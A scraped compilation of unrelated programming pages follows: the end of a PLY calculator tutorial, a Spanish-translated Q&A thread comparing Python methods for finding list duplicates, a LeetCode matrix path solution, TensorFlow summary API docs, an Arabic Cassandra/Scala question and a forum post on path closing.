print(f"Syntax Error: {t.value!r}")
parser = yacc.yacc()
if __name__ == "__main__":
while True:
inp = input("> ")
print(parser.parse(inp))
First we start off with the tokens: numbers, mathematical operations, and parenthesis.
You might notice that I didn't use the reserved_tokens trick, but you can implement it if you want.
Next we have a simple number token which matches 0-9 with \d+ and then converts its value from a string to an integer.
The next code we haven't used before is t_ignore.
This variable represents a list of all characters the lexer should ignore, which is \t which means spaces and tabs.
When the lexer sees these, it will just skip them. This allows users to add spaces without it affecting the lexer.
Now we have 3 parser directives.
The first is a large one, producing an expression from 4 possible input values, one for each math operation.
Each input has an expression on either side of the math operator.
Inside this directive, we have some (pretty ugly) code that performs the correct operation based on the operation token given.
If you want to make this prettier, consider a dictionary using the python stdlib operator module.
Next, we define an expression with parenthesis around it as being the same as the expression inside.
This makes parenthesis value be substituted in for them, making them evaluate inside first.
With very little code we created a very complicated rule that can deal with nested parenthesis correctly.
Finally, we define a number as being able to be an expression, which allows a number to be used as one of the expressions in rule 1.
For a challenge, try adding variables into this calculator!
You should be able to set variables by using syntax likevarname = any_expressionand you should be able to use variables in expressions.
If you're stuck, see one solution from the PLY docs.
Thats it!
Thanks for reading! If you have questions, feel free to ask on the Replit discord's #help-and-reviews channel, or just the comments.
Have fun!
|
Para eliminar duplicados utiliza set(a) . Para imprimir duplicados, algo como:
a = [1,2,3,2,1,5,6,5,5,5] import collections print [item for item, count in collections.Counter(a).items() if count > 1] ## [1, 2, 5]
Tenga en cuenta que el Counter no es particularmente eficiente ( tiempos ) y probablemente exagerar aquí. set se desempeñará mejor. Este código calcula una lista de elementos únicos en el orden de origen:
seen = set() uniq = [] for x in a: if x not in seen: uniq.append(x) seen.add(x)
o, más concisamente:
seen = set() uniq = [x for x in a if x not in seen and not seen.add(x)]
No recomiendo este último estilo, porque no es obvio lo que not seen.add(x) está haciendo (el método set add() siempre devuelve None , de ahí la necesidad de not ).
Para calcular la lista de elementos duplicados sin bibliotecas:
seen = {} dupes = [] for x in a: if x not in seen: seen[x] = 1 else: if seen[x] == 1: dupes.append(x) seen[x] += 1
Si los elementos de la lista no son hashables, no puede usar sets / dicts y tiene que recurrir a una solución de tiempo cuadrática (compare cada uno). Por ejemplo:
a = [[1], [2], [3], [1], [5], [3]] no_dupes = [x for n, x in enumerate(a) if x not in a[:n]] print no_dupes # [[1], [2], [3], [5]] dupes = [x for n, x in enumerate(a) if x in a[:n]] print dupes # [[1], [3]]
>>> l = [1,2,3,4,4,5,5,6,1] >>> set([x for x in l if l.count(x) > 1]) set([1, 4, 5])
No necesita el recuento, solo si el elemento fue visto antes o no. Adapté esa respuesta a este problema:
def list_duplicates(seq): seen = set() seen_add = seen.add # adds all elements it doesn't know yet to seen and all other to seen_twice seen_twice = set( x for x in seq if x in seen or seen_add(x) ) # turn the set into a list (as requested) return list( seen_twice ) a = [1,2,3,2,1,5,6,5,5,5] list_duplicates(a) # yields [1, 2, 5]
Por si acaso la velocidad importa, aquí hay algunos horarios:
# file: test.py import collections def thg435(l): return [x for x, y in collections.Counter(l).items() if y > 1] def moooeeeep(l): seen = set() seen_add = seen.add # adds all elements it doesn't know yet to seen and all other to seen_twice seen_twice = set( x for x in l if x in seen or seen_add(x) ) # turn the set into a list (as requested) return list( seen_twice ) def RiteshKumar(l): return list(set([x for x in l if l.count(x) > 1])) def JohnLaRooy(L): seen = set() seen2 = set() seen_add = seen.add seen2_add = seen2.add for item in L: if item in seen: seen2_add(item) else: seen_add(item) return list(seen2) l = [1,2,3,2,1,5,6,5,5,5]*100
Aquí están los resultados: (¡bien hecho @JohnLaRooy!)
$ python -mtimeit -s 'import test' 'test.JohnLaRooy(test.l)' 10000 loops, best of 3: 74.6 usec per loop $ python -mtimeit -s 'import test' 'test.moooeeeep(test.l)' 10000 loops, best of 3: 91.3 usec per loop $ python -mtimeit -s 'import test' 'test.thg435(test.l)' 1000 loops, best of 3: 266 usec per loop $ python -mtimeit -s 'import test' 'test.RiteshKumar(test.l)' 100 loops, best of 3: 8.35 msec per loop
Curiosamente, además de los tiempos en sí, también la clasificación cambia ligeramente cuando se usa pypy. Lo más interesante es que el enfoque basado en el contador se beneficia enormemente de las optimizaciones de pypy, mientras que el método de almacenamiento en caché que he sugerido parece no tener casi ningún efecto.
$ pypy -mtimeit -s 'import test' 'test.JohnLaRooy(test.l)' 100000 loops, best of 3: 17.8 usec per loop $ pypy -mtimeit -s 'import test' 'test.thg435(test.l)' 10000 loops, best of 3: 23 usec per loop $ pypy -mtimeit -s 'import test' 'test.moooeeeep(test.l)' 10000 loops, best of 3: 39.3 usec per loop
Al parecer, este efecto está relacionado con la “duplicación” de los datos de entrada. He establecido l = [random.randrange(1000000) for i in xrange(10000)] y obtuve estos resultados:
$ pypy -mtimeit -s 'import test' 'test.moooeeeep(test.l)' 1000 loops, best of 3: 495 usec per loop $ pypy -mtimeit -s 'import test' 'test.JohnLaRooy(test.l)' 1000 loops, best of 3: 499 usec per loop $ pypy -mtimeit -s 'import test' 'test.thg435(test.l)' 1000 loops, best of 3: 1.68 msec per loop
Encontré esta pregunta mientras miraba algo relacionado, y me pregunto por qué nadie ofreció una solución basada en un generador. Resolver este problema sería:
>>> print list(getDupes_9([1,2,3,2,1,5,6,5,5,5])) [1, 2, 5]
Estaba preocupado por la escalabilidad, por lo que probé varios enfoques, incluidos elementos ingenuos que funcionan bien en listas pequeñas, pero su escala es horriblemente más grande (nota: habría sido mejor usar timeit, pero esto es ilustrativo).
Incluí @moooeeeep para comparación (es impresionantemente rápido: más rápido si la lista de entrada es completamente aleatoria) y un enfoque de itertools que es incluso más rápido nuevamente para la mayoría de las listas ordenadas … Ahora incluye el enfoque de pandas de @firelynx – lento, pero no horriblemente así, y simple. Nota: el enfoque de clasificación / tee / zip es consistentemente más rápido en mi máquina para grandes listas mayormente ordenadas, moooeeeep es más rápido para listas barajadas, pero su millaje puede variar.
Ventajas
Suposiciones
La solución más rápida, entradas de 1m:
def getDupes(c): '''sort/tee/izip''' a, b = itertools.tee(sorted(c)) next(b, None) r = None for k, g in itertools.izip(a, b): if k != g: continue if k != r: yield k r = k
Enfoques probados
import itertools import time import random def getDupes_1(c): '''naive''' for i in xrange(0, len(c)): if c[i] in c[:i]: yield c[i] def getDupes_2(c): '''set len change''' s = set() for i in c: l = len(s) s.add(i) if len(s) == l: yield i def getDupes_3(c): '''in dict''' d = {} for i in c: if i in d: if d[i]: yield i d[i] = False else: d[i] = True def getDupes_4(c): '''in set''' s,r = set(),set() for i in c: if i not in s: s.add(i) elif i not in r: r.add(i) yield i def getDupes_5(c): '''sort/adjacent''' c = sorted(c) r = None for i in xrange(1, len(c)): if c[i] == c[i - 1]: if c[i] != r: yield c[i] r = c[i] def getDupes_6(c): '''sort/groupby''' def multiple(x): try: x.next() x.next() return True except: return False for k, g in itertools.ifilter(lambda x: multiple(x[1]), itertools.groupby(sorted(c))): yield k def getDupes_7(c): '''sort/zip''' c = sorted(c) r = None for k, g in zip(c[:-1],c[1:]): if k == g: if k != r: yield k r = k def getDupes_8(c): '''sort/izip''' c = sorted(c) r = None for k, g in itertools.izip(c[:-1],c[1:]): if k == g: if k != r: yield k r = k def getDupes_9(c): '''sort/tee/izip''' a, b = itertools.tee(sorted(c)) next(b, None) r = None for k, g in itertools.izip(a, b): if k != g: continue if k != r: yield k r = k def getDupes_a(l): '''moooeeeep''' seen = set() seen_add = seen.add # adds all elements it doesn't know yet to seen and all other to seen_twice for x in l: if x in seen or seen_add(x): yield x def getDupes_b(x): '''iter*/sorted''' x = sorted(x) def _matches(): for k,g in itertools.izip(x[:-1],x[1:]): if k == g: yield k for k, n in itertools.groupby(_matches()): yield k def getDupes_c(a): '''pandas''' import pandas as pd vc = pd.Series(a).value_counts() i = vc[vc > 1].index for _ in i: yield _ def hasDupes(fn,c): try: if fn(c).next(): return True # Found a dupe except StopIteration: pass return False def getDupes(fn,c): return list(fn(c)) STABLE = True if STABLE: print 'Finding FIRST then ALL duplicates, single dupe of "nth" placed element in 1m element array' else: print 'Finding FIRST then ALL duplicates, single dupe of "n" included in randomised 1m element array' for location in (50,250000,500000,750000,999999): for test in (getDupes_2, getDupes_3, getDupes_4, getDupes_5, getDupes_6, getDupes_8, getDupes_9, getDupes_a, getDupes_b, getDupes_c): print 'Test %-15s:%10d - '%(test.__doc__ or test.__name__,location), deltas = [] for FIRST in (True,False): for i in xrange(0, 5): c = range(0,1000000) if STABLE: c[0] = location else: c.append(location) random.shuffle(c) start = time.time() if FIRST: print '.' if location == test(c).next() else '!', else: print '.' if [location] == list(test(c)) else '!', deltas.append(time.time()-start) print ' -- %0.3f '%(sum(deltas)/len(deltas)), print print
Los resultados para la prueba ‘Todos los duplicados’ fueron consistentes, encontrando “primero” duplicado luego “todos” duplicados en esta matriz:
Finding FIRST then ALL duplicates, single dupe of "nth" placed element in 1m element array Test set len change : 500000 - . . . . . -- 0.264 . . . . . -- 0.402 Test in dict : 500000 - . . . . . -- 0.163 . . . . . -- 0.250 Test in set : 500000 - . . . . . -- 0.163 . . . . . -- 0.249 Test sort/adjacent : 500000 - . . . . . -- 0.159 . . . . . -- 0.229 Test sort/groupby : 500000 - . . . . . -- 0.860 . . . . . -- 1.286 Test sort/izip : 500000 - . . . . . -- 0.165 . . . . . -- 0.229 Test sort/tee/izip : 500000 - . . . . . -- 0.145 . . . . . -- 0.206 * Test moooeeeep : 500000 - . . . . . -- 0.149 . . . . . -- 0.232 Test iter*/sorted : 500000 - . . . . . -- 0.160 . . . . . -- 0.221 Test pandas : 500000 - . . . . . -- 0.493 . . . . . -- 0.499
Cuando las listas se barajan primero, el precio de la clase se hace evidente: la eficiencia se reduce notablemente y el enfoque @moooeeeep domina, con los enfoques set y dict que son similares pero con menor rendimiento:
Finding FIRST then ALL duplicates, single dupe of "n" included in randomised 1m element array Test set len change : 500000 - . . . . . -- 0.321 . . . . . -- 0.473 Test in dict : 500000 - . . . . . -- 0.285 . . . . . -- 0.360 Test in set : 500000 - . . . . . -- 0.309 . . . . . -- 0.365 Test sort/adjacent : 500000 - . . . . . -- 0.756 . . . . . -- 0.823 Test sort/groupby : 500000 - . . . . . -- 1.459 . . . . . -- 1.896 Test sort/izip : 500000 - . . . . . -- 0.786 . . . . . -- 0.845 Test sort/tee/izip : 500000 - . . . . . -- 0.743 . . . . . -- 0.804 Test moooeeeep : 500000 - . . . . . -- 0.234 . . . . . -- 0.311 * Test iter*/sorted : 500000 - . . . . . -- 0.776 . . . . . -- 0.840 Test pandas : 500000 - . . . . . -- 0.539 . . . . . -- 0.540
Puedes usar iteration_utilities.duplicates :
>>> from iteration_utilities import duplicates >>> list(duplicates([1,1,2,1,2,3,4,2])) [1, 1, 2, 2]
o si solo desea uno de cada duplicado, se puede combinar con iteration_utilities.unique_everseen :
>>> from iteration_utilities import unique_everseen >>> list(unique_everseen(duplicates([1,1,2,1,2,3,4,2]))) [1, 2]
También puede manejar elementos inestables (sin embargo, a costa del rendimiento):
>>> list(duplicates([[1], [2], [1], [3], [1]])) [[1], [1]] >>> list(unique_everseen(duplicates([[1], [2], [1], [3], [1]]))) [[1]]
Eso es algo que solo algunos de los otros enfoques aquí pueden manejar.
Hice un punto de referencia rápido que contiene la mayoría (pero no todos) de los enfoques mencionados aquí.
El primer punto de referencia incluyó solo un pequeño rango de longitudes de lista porque algunos enfoques tienen un comportamiento O(n**2) .
En los gráficos, el eje y representa el tiempo, por lo que un valor más bajo significa mejor. También se traza log-log para que se pueda visualizar mejor la amplia gama de valores:
Eliminando los enfoques O(n**2) hice otro punto de referencia de hasta medio millón de elementos en una lista:
Como puede ver, el enfoque unique_everseen(duplicates(...)) es más rápido que cualquiera de los otros enfoques e incluso el encadenamiento de unique_everseen(duplicates(...)) fue más rápido o igual de rápido que los otros enfoques.
Una cosa interesante adicional que se debe tener en cuenta aquí es que los enfoques de pandas son muy lentos para listas pequeñas, pero pueden competir fácilmente por listas más largas.
Sin embargo, como estos puntos de referencia muestran que la mayoría de los enfoques tienen un desempeño más o menos equitativo, no importa mucho cuál se use (a excepción de los 3 que tenían el tiempo de ejecución de O(n**2) ).
from iteration_utilities import duplicates, unique_everseen from collections import Counter import pandas as pd import itertools def georg_counter(it): return [item for item, count in Counter(it).items() if count > 1] def georg_set(it): seen = set() uniq = [] for x in it: if x not in seen: uniq.append(x) seen.add(x) def georg_set2(it): seen = set() return [x for x in it if x not in seen and not seen.add(x)] def georg_set3(it): seen = {} dupes = [] for x in it: if x not in seen: seen[x] = 1 else: if seen[x] == 1: dupes.append(x) seen[x] += 1 def RiteshKumar_count(l): return set([x for x in l if l.count(x) > 1]) def moooeeeep(seq): seen = set() seen_add = seen.add # adds all elements it doesn't know yet to seen and all other to seen_twice seen_twice = set( x for x in seq if x in seen or seen_add(x) ) # turn the set into a list (as requested) return list( seen_twice ) def F1Rumors_implementation(c): a, b = itertools.tee(sorted(c)) next(b, None) r = None for k, g in zip(a, b): if k != g: continue if k != r: yield k r = k def F1Rumors(c): return list(F1Rumors_implementation(c)) def Edward(a): d = {} for elem in a: if elem in d: d[elem] += 1 else: d[elem] = 1 return [x for x, y in d.items() if y > 1] def wordsmith(a): return pd.Series(a)[pd.Series(a).duplicated()].values def NikhilPrabhu(li): li = li.copy() for x in set(li): li.remove(x) return list(set(li)) def firelynx(a): vc = pd.Series(a).value_counts() return vc[vc > 1].index.tolist() def HenryDev(myList): newList = set() for i in myList: if myList.count(i) >= 2: newList.add(i) return list(newList) def yota(number_lst): seen_set = set() duplicate_set = set(x for x in number_lst if x in seen_set or seen_set.add(x)) return seen_set - duplicate_set def IgorVishnevskiy(l): s=set(l) d=[] for x in l: if x in s: s.remove(x) else: d.append(x) return d def it_duplicates(l): return list(duplicates(l)) def it_unique_duplicates(l): return list(unique_everseen(duplicates(l)))
from simple_benchmark import benchmark import random funcs = [ georg_counter, georg_set, georg_set2, georg_set3, RiteshKumar_count, moooeeeep, F1Rumors, Edward, wordsmith, NikhilPrabhu, firelynx, HenryDev, yota, IgorVishnevskiy, it_duplicates, it_unique_duplicates ] args = {2**i: [random.randint(0, 2**(i-1)) for _ in range(2**i)] for i in range(2, 12)} b = benchmark(funcs, args, 'list size') b.plot()
funcs = [ georg_counter, georg_set, georg_set2, georg_set3, moooeeeep, F1Rumors, Edward, wordsmith, firelynx, yota, IgorVishnevskiy, it_duplicates, it_unique_duplicates ] args = {2**i: [random.randint(0, 2**(i-1)) for _ in range(2**i)] for i in range(2, 20)} b = benchmark(funcs, args, 'list size') b.plot()
1 Esto es de una biblioteca de terceros que he escrito: iteration_utilities .
colecciones.Counter es nuevo en Python 2.7:
Python 2.5.4 (r254:67916, May 31 2010, 15:03:39) [GCC 4.1.2 20080704 (Red Hat 4.1.2-46)] on linux2 a = [1,2,3,2,1,5,6,5,5,5] import collections print [x for x, y in collections.Counter(a).items() if y > 1] Type "help", "copyright", "credits" or "license" for more information. File "", line 1, in AttributeError: 'module' object has no attribute 'Counter' >>>
En una versión anterior puedes usar un dict convencional en su lugar:
a = [1,2,3,2,1,5,6,5,5,5] d = {} for elem in a: if elem in d: d[elem] += 1 else: d[elem] = 1 print [x for x, y in d.items() if y > 1]
Utilizando pandas:
>>> import pandas as pd >>> a = [1, 2, 1, 3, 3, 3, 0] >>> pd.Series(a)[pd.Series(a).duplicated()].values array([1, 3, 3])
Aquí hay una solución limpia y concisa:
for x in set(li): li.remove(x) li = list(set(li))
¿Qué tal si recorre cada elemento de la lista verificando el número de ocurrencias y luego agregándolas a un conjunto que luego imprimirá los duplicados? Espero que esto ayude a alguien por ahí.
myList = [2 ,4 , 6, 8, 4, 6, 12]; newList = set() for i in myList: if myList.count(i) >= 2: newList.add(i) print(list(newList)) ## [4 , 6]
Sin convertir a la lista y probablemente la forma más sencilla sería algo como a continuación. Esto puede ser útil durante una entrevista cuando piden no usar sets
a=[1,2,3,3,3] dup=[] for each in a: if each not in dup: dup.append(each) print(dup)
======= else para obtener 2 listas separadas de valores únicos y valores duplicados
a=[1,2,3,3,3] uniques=[] dups=[] for each in a: if each not in uniques: uniques.append(each) else: dups.append(each) print("Unique values are below:") print(uniques) print("Duplicate values are below:") print(dups)
Haría esto con pandas, porque uso mucho pandas
import pandas as pd a = [1,2,3,3,3,4,5,6,6,7] vc = pd.Series(a).value_counts() vc[vc > 1].index.tolist()
Da
[3,6]
Probablemente no sea muy eficiente, pero seguro que es menos código que muchas de las otras respuestas, así que pensé que contribuiría
El tercer ejemplo de la respuesta aceptada da una respuesta errónea y no intenta dar duplicados. Aquí está la versión correcta:
number_lst = [1, 1, 2, 3, 5, ...] seen_set = set() duplicate_set = set(x for x in number_lst if x in seen_set or seen_set.add(x)) unique_set = seen_set - duplicate_set
Un poco tarde, pero tal vez útil para algunos. Para una lista bastante larga, encontré que esto funcionó para mí.
l=[1,2,3,5,4,1,3,1] s=set(l) d=[] for x in l: if x in s: s.remove(x) else: d.append(x) d [1,3,1]
Muestra justo y todos los duplicados y conserva el orden.
Una forma muy simple y rápida de encontrar duplicados con una iteración en Python es:
testList = ['red', 'blue', 'red', 'green', 'blue', 'blue'] testListDict = {} for item in testList: try: testListDict[item] += 1 except: testListDict[item] = 1 print testListDict
La salida será la siguiente:
>>> print testListDict {'blue': 3, 'green': 1, 'red': 2}
Esto y más en mi blog http://www.howtoprogramwithpython.com
Podemos usar itertools.groupby para encontrar todos los elementos que tienen dups:
from itertools import groupby myList = [2, 4, 6, 8, 4, 6, 12] # when the list is sorted, groupby groups by consecutive elements which are similar for x, y in groupby(sorted(myList)): # list(y) returns all the occurences of item x if len(list(y)) > 1: print x
La salida será:
4 6
list2 = [1, 2, 3, 4, 1, 2, 3] lset = set() [(lset.add(item), list2.append(item)) for item in list2 if item not in lset] print list(lset)
Una solución de línea:
set([i for i in list if sum([1 for a in list if a == i]) > 1])
Hay muchas respuestas aquí arriba, pero creo que este es un enfoque relativamente legible y fácil de entender:
def get_duplicates(sorted_list): duplicates = [] last = sorted_list[0] for x in sorted_list[1:]: if x == last: duplicates.append(x) last = x return set(duplicates)
Notas:
Aquí hay un generador rápido que usa un dict para almacenar cada elemento como una clave con un valor booleano para verificar si el elemento duplicado ya se ha producido.
Para listas con todos los elementos que son tipos hashable:
def gen_dupes(array): unique = {} for value in array: if value in unique and unique[value]: unique[value] = False yield value else: unique[value] = True array = [1, 2, 2, 3, 4, 1, 5, 2, 6, 6] print(list(gen_dupes(array))) # => [2, 1, 6]
Para listas que pueden contener listas:
def gen_dupes(array): unique = {} for value in array: is_list = False if type(value) is list: value = tuple(value) is_list = True if value in unique and unique[value]: unique[value] = False if is_list: value = list(value) yield value else: unique[value] = True array = [1, 2, 2, [1, 2], 3, 4, [1, 2], 5, 2, 6, 6] print(list(gen_dupes(array))) # => [2, [1, 2], 6]
def removeduplicates(a): seen = set() for i in a: if i not in seen: seen.add(i) return seen print(removeduplicates([1,1,2,2]))
Algunas otras pruebas. Por supuesto que hacer …
set([x for x in l if l.count(x) > 1])
… es demasiado costoso Es aproximadamente 500 veces más rápido (la matriz más larga da mejores resultados) para usar el siguiente método final:
def dups_count_dict(l): d = {} for item in l: if item not in d: d[item] = 0 d[item] += 1 result_d = {key: val for key, val in d.iteritems() if val > 1} return result_d.keys()
Solo 2 bucles, no hay operaciones l.count() muy costosas.
Aquí hay un código para comparar los métodos por ejemplo. El código está abajo, aquí está la salida:
dups_count: 13.368s # this is a function which uses l.count() dups_count_dict: 0.014s # this is a final best function (of the 3 functions) dups_count_counter: 0.024s # collections.Counter
El código de prueba:
import numpy as np from time import time from collections import Counter class TimerCounter(object): def __init__(self): self._time_sum = 0 def start(self): self.time = time() def stop(self): self._time_sum += time() - self.time def get_time_sum(self): return self._time_sum def dups_count(l): return set([x for x in l if l.count(x) > 1]) def dups_count_dict(l): d = {} for item in l: if item not in d: d[item] = 0 d[item] += 1 result_d = {key: val for key, val in d.iteritems() if val > 1} return result_d.keys() def dups_counter(l): counter = Counter(l) result_d = {key: val for key, val in counter.iteritems() if val > 1} return result_d.keys() def gen_array(): np.random.seed(17) return list(np.random.randint(0, 5000, 10000)) def assert_equal_results(*results): primary_result = results[0] other_results = results[1:] for other_result in other_results: assert set(primary_result) == set(other_result) and len(primary_result) == len(other_result) if __name__ == '__main__': dups_count_time = TimerCounter() dups_count_dict_time = TimerCounter() dups_count_counter = TimerCounter() l = gen_array() for i in range(3): dups_count_time.start() result1 = dups_count(l) dups_count_time.stop() dups_count_dict_time.start() result2 = dups_count_dict(l) dups_count_dict_time.stop() dups_count_counter.start() result3 = dups_counter(l) dups_count_counter.stop() assert_equal_results(result1, result2, result3) print 'dups_count: %.3f' % dups_count_time.get_time_sum() print 'dups_count_dict: %.3f' % dups_count_dict_time.get_time_sum() print 'dups_count_counter: %.3f' % dups_count_counter.get_time_sum()
Esta es la forma en que tuve que hacerlo porque me desafié a no usar otros métodos:
def dupList(oldlist): if type(oldlist)==type((2,2)): oldlist=[x for x in oldlist] newList=[] newList=newList+oldlist oldlist=oldlist forbidden=[] checkPoint=0 for i in range(len(oldlist)): #print 'start i', i if i in forbidden: continue else: for j in range(len(oldlist)): #print 'start j', j if j in forbidden: continue else: #print 'after Else' if i!=j: #print 'i,j', i,j #print oldlist #print newList if oldlist[j]==oldlist[i]: #print 'oldlist[i],oldlist[j]', oldlist[i],oldlist[j] forbidden.append(j) #print 'forbidden', forbidden del newList[j-checkPoint] #print newList checkPoint=checkPoint+1 return newList
por lo que su muestra funciona como:
>>>a = [1,2,3,3,3,4,5,6,6,7] >>>dupList(a) [1, 2, 3, 4, 5, 6, 7]
Al usar toolz :
from toolz import frequencies, valfilter a = [1,2,2,3,4,5,4] >>> list(valfilter(lambda count: count > 1, frequencies(a)).keys()) [2,4]
Estoy entrando mucho mucho más tarde en esta discusión. Aun así, me gustaría tratar este problema con una sola línea. Porque ese es el encanto de Python. Si solo queremos obtener los duplicados en una lista separada (o en cualquier colección), sugeriría hacer lo siguiente. Supongamos que tenemos una lista duplicada a la que podemos llamar “objective”.
target=[1,2,3,4,4,4,3,5,6,8,4,3]
Ahora, si queremos obtener los duplicados, podemos usar el forro de la siguiente manera:
duplicates=dict(set((x,target.count(x)) for x in filter(lambda rec : target.count(rec)>1,target)))
Este código colocará los registros duplicados como clave y contará como valor en el diccionario ‘duplicados’. El diccionario ‘duplicado’ se verá como a continuación:
{3: 3, 4: 4} #it saying 3 is repeated 3 times and 4 is 4 times
Si solo desea que todos los registros con duplicados solo en una lista, es un código mucho más corto:
duplicates=filter(lambda rec : target.count(rec)>1,target)
La salida será:
[3, 4, 4, 4, 3, 4, 3]
Esto funciona perfectamente en las versiones de python 2.7.x +
Método 1:
list(set([val for idx, val in enumerate(input_list) if val in input_list[idx+1:]]))
Explicación: [val para idx, val in enumerate (input_list) si val en input_list [idx + 1:]] es una lista de comprensión, que devuelve un elemento, si el mismo elemento está presente desde su posición actual, en la lista, el índice .
Ejemplo: input_list = [42,31,42,31,3,31,31,5,6,6,6,6,6,7,42]
comenzando con el primer elemento en la lista, 42, con el índice 0, comprueba si el elemento 42, está presente en input_list [1:] (es decir, desde el índice 1 hasta el final de la lista) Debido a que 42 está presente en input_list [1:] , volverá 42.
Luego pasa al siguiente elemento 31, con el índice 1, y comprueba si el elemento 31 está presente en la lista de entrada [2:] (es decir, desde el índice 2 hasta el final de la lista), porque 31 está presente en la lista de entrada [2:], volverá 31.
de manera similar, recorre todos los elementos de la lista y devolverá solo los elementos repetidos / duplicados en una lista.
Luego, debido a que tenemos duplicados, en una lista, debemos elegir uno de cada duplicado, es decir, eliminar duplicados entre duplicados, y para hacerlo, llamamos a un conjunto incorporado de python llamado (), y elimina los duplicados,
Luego nos quedamos con un conjunto, pero no una lista, y por lo tanto, para convertir de un conjunto a una lista, usamos, encasillamiento, lista (), y eso convierte el conjunto de elementos en una lista.
Método 2:
def dupes(ilist): temp_list = [] # initially, empty temporary list dupe_list = [] # initially, empty duplicate list for each in ilist: if each in temp_list: # Found a Duplicate element if not each in dupe_list: # Avoid duplicate elements in dupe_list dupe_list.append(each) # Add duplicate element to dupe_list else: temp_list.append(each) # Add a new (non-duplicate) to temp_list return dupe_list
Explicación: Aquí creamos dos listas vacías, para empezar. Luego, siga recorriendo todos los elementos de la lista para ver si existe en temp_list (inicialmente vacío). Si no está en la lista temp_list, entonces la agregamos a la lista temp, usando el método de adición.
Si ya existe en temp_list, significa que el elemento actual de la lista es un duplicado y, por lo tanto, debemos agregarlo a dupe_list mediante el método de adición.
raw_list = [1,2,3,3,4,5,6,6,7,2,3,4,2,3,4,1,3,4,] clean_list = list(set(raw_list)) duplicated_items = [] for item in raw_list: try: clean_list.remove(item) except ValueError: duplicated_items.append(item) print(duplicated_items) # [3, 6, 2, 3, 4, 2, 3, 4, 1, 3, 4]
Básicamente, se eliminan los duplicados convirtiéndolos en set ( clean_list ), luego se itera en raw_list , mientras se eliminan todos los item de la lista limpia para que aparezcan en raw_list . Si no se encuentra el elemento, la excepción ValueError se captura y el item se agrega a la lista duplicated_items .
If the index of duplicated items is needed, just enumerate the list and play around with the index. ( for index, item in enumerate(raw_list): ) which is faster and optimised for large lists (like thousands+ of elements)
Use the sort() function. Duplicates can be identified by looping over it and checking l1[i] == l1[i+1] .
|
Description
Given an integer matrix, find the length of the longest increasing path.
From each cell, you can either move to four directions: left, right, up or down. You may NOT move diagonally or move outside of the boundary (i.e. wrap-around is not allowed).
Example 1:
Input:nums = [ [9,9,4], [6,6,8], [2,1,1] ]Output:4Explanation:The longest increasing path is[1, 2, 6, 9].
Example 2:
Input:nums = [ [3,4,5], [3,2,6], [2,2,1] ]Output:4Explanation:The longest increasing path is[3, 4, 5, 6]. Moving diagonally is not allowed.
Explanation
dfs + memorization
Python Solution
class Solution:
def longestIncreasingPath(self, matrix: List[List[int]]) -> int:
if not matrix:
return 0
cache = [[0 for j in range(len(matrix[0]))] for i in range(len(matrix))]
result = 0
for i in range(len(matrix)):
for j in range(len(matrix[0])):
result = max(result, self.helper(matrix, i, j, cache))
return result
def helper(self, matrix, i, j, cache):
directions = [(0, 1), (0, -1), (-1, 0), (1, 0)]
if cache[i][j] != 0:
return cache[i][j]
for direction in directions:
x = i + direction[0]
y = j + direction[1]
if 0 <= x and x < len(matrix) and 0 <= y and y < len(matrix[0]) and matrix[x][y] > matrix[i][j]:
cache[i][j] = max(cache[i][j], self.helper(matrix, x, y, cache))
cache[i][j] += 1
return cache[i][j]
Time Complexity: ~MN
Space Complexity: ~MN
|
TensorFlow 1 version View source on GitHub
Operations for writing summary data, for use in analysis and visualization.
The tf.summary module provides APIs for writing summary data. This data can bevisualized in TensorBoard, the visualization toolkit that comes with TensorFlow.See the TensorBoard website for moredetailed tutorials about how to use these APIs, or some quick examples below.
Example usage with eager execution, the default in TF 2.0:
writer = tf.summary.create_file_writer("/tmp/mylogs")
with writer.as_default():
for step in range(100):
# other model code would go here
tf.summary.scalar("my_metric", 0.5, step=step)
writer.flush()
Example usage with tf.function graph execution:
writer = tf.summary.create_file_writer("/tmp/mylogs")
@tf.function
def my_func(step):
# other model code would go here
with writer.as_default():
tf.summary.scalar("my_metric", 0.5, step=step)
for step in range(100):
my_func(step)
writer.flush()
Example usage with legacy TF 1.x graph execution:
with tf.compat.v1.Graph().as_default():
step = tf.Variable(0, dtype=tf.int64)
step_update = step.assign_add(1)
writer = tf.summary.create_file_writer("/tmp/mylogs")
with writer.as_default():
tf.summary.scalar("my_metric", 0.5, step=step)
all_summary_ops = tf.compat.v1.summary.all_v2_summary_ops()
writer_flush = writer.flush()
sess = tf.compat.v1.Session()
sess.run([writer.init(), step.initializer])
for i in range(100):
sess.run(all_summary_ops)
sess.run(step_update)
sess.run(writer_flush)
Modules
experimental module: Public API for tf.summary.experimental namespace.
Classes
class SummaryWriter: Interface representing a stateful summary writer object.
Functions
audio(...): Write an audio summary.
create_file_writer(...): Creates a summary file writer for the given log directory.
create_noop_writer(...): Returns a summary writer that does nothing.
flush(...): Forces summary writer to send any buffered data to storage.
histogram(...): Write a histogram summary.
image(...): Write an image summary.
record_if(...): Sets summary recording on or off per the provided boolean value.
scalar(...): Write a scalar summary.
should_record_summaries(...): Returns boolean Tensor which is true if summaries should be recorded.
text(...): Write a text summary.
trace_export(...): Stops and exports the active trace as a Summary and/or profile file.
trace_off(...): Stops the current trace and discards any collected information.
trace_on(...): Starts a trace to record computation graphs and profiling information.
write(...): Writes a generic summary to the default SummaryWriter if one exists.
|
لقد اتبعت مخطط جدول كاساندرا: -
CREATE TABLE test (id text,stats frozen<map<text, text>> )
لقد قمت بإنشاء تطبيق scala لاستخراج البيانات من كاساندرا وبعد بعض التلاعب سيتم تحديث البيانات مرة أخرى إلى كاساندرا.
val result = session.execute("Select * from test where id= 'testid'")
val resultList = result.all()
val rows = resultList.iterator()
if (resultList.size() > 0) {
while (rows.hasNext()) {
val curRow = rows.next()
val ID = curRow.getString("id")
val statistics = curRow.getMap[String,String] ??????
}
}
صف البيانات في جدول كاساندرا مثل هذا: -
('testid',{'a1': '10', 'a2': '0', 'a3': '0', 'a4': '22', 'd1': '0', 'd2': '1', 'd3': '1', 'd4': '0', 'exb': '0', 'inb': '6', 'satno': '10'})
('id123',{'a1': '10', 'a2': '0', 'd1': '0', 'd2': '1', 'd3': '1', 'd4': '0'})
أريد تعيين حقل الإحصائيات الخاص بي بالضبط في الإحصائيات. كيف يجب أن أفعل هذا الحقول الخاصة بي في عمود الإحصائيات ديناميكي لصف واحد قد يحتوي على 10 أزواج قيمة رئيسية للصف الآخر ، قد يحتوي على 7 أزواج قيمة رئيسية.
شكر،
|
Problem with path closing
eduairetlast edited by gferreira
Hi everyone:
I'm making shapes using the arc tools and I'm having a problem in the intersection of two points:
